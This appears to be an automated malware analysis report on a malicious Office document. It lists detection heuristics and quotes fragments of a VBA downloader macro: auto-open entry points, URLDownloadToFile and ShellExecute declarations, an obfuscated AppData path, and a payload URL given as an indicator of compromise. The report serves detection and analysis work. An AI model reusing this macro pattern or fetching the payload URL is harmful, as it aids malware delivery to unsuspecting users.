Malicious Office (OLE) — malware analysis report

Heuristics 13

• ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
• Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
  Reference to URLDownloadToFile API
• VBA macros detected medium 7 related findings OLE_VBA_MACROS
  Document contains VBA macro code
• URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
  URLDownloadToFile in VBA
  Matched line in script

  Attribute VB_Customizable = True
  Private Declare Function URLDownloadToFileA Lib "urlmon.dll" (ByVal TENCQNBGFw As Long, ByVal dCkTfeN As String, ByVal FNyNPBwqcg As String, ByVal LsRWaVqvhd As Long, ByVal quHTcQK As Long) As Long
  Private Declare Function ShellExecuteW Lib "shell32.dll" (ByVal kDh As Long, ByVal idMX As Long, ByVal oOexxstN As Long, ByVal NTvcL As Long, ByVal GAjKkAqdYM As Long, ByVal RfsHaPMhN As Long) As Long

• VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
• AutoOpen macro low OLE_VBA_AUTOOPEN
  AutoOpen macro
  Matched line in script

  Sub AutoOpen()
  Call ijiijjijiojioijoijo

• Workbook_Open macro low OLE_VBA_WBOPEN
  Workbook_Open macro
  Matched line in script

  Private Declare Function ShellExecuteW Lib "shell32.dll" (ByVal kDh As Long, ByVal idMX As Long, ByVal oOexxstN As Long, ByVal NTvcL As Long, ByVal GAjKkAqdYM As Long, ByVal RfsHaPMhN As Long) As Long
  Sub Workbook_Open()
  Call ijiijjijiojioijoijo

• Auto_Open macro low OLE_VBA_AUTO
  Auto_Open macro
  Matched line in script

  End Function
  Sub Auto_Open()
  Call ijiijjijiojioijoijo

• Environ() call (env variable access) low OLE_VBA_ENVIRON
  Environ() call (env variable access)
  Matched line in script

  Private Function ijiijjijiojioijoijo() As Integer
  Call bvbvbvbvbvbv(Environ("ap" & "p" & "d" & "ata") & "\" & uyuyuyuyuy)
  Application.DisplayAlerts = False

• URL de-obfuscated from VBA string literal (1 URL) info OLE_VBA_OBFUSCATED_URL
  A VBA macro hides its download URL inside a string literal that is de-obfuscated at runtime — junk digits or a Replace() junk token interleaved through the URL, or the URL stored reversed (StrReverse). The decoded host is the next-stage payload URL (URLDownloadToFile/XMLHTTP/ShellExecute); surfaced as an IOC. Self-validating: only a transform that yields a syntactically valid host URL is reported.
• Reference to ShellExecute API high SC_STR_SHELLEXEC
  Reference to ShellExecute API
• Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
  OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
• Embedded URL info EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL http://auteam.com.mx/js/js/logo.gif Referenced by macro

  • http://ns.adobe.com/xap/1.0/Referenced by macro
  • http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
  • http://purl.org/dc/elements/1.1/Referenced by macro
  • http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro

Open this report in the interactive analyzer, or submit your own file for analysis.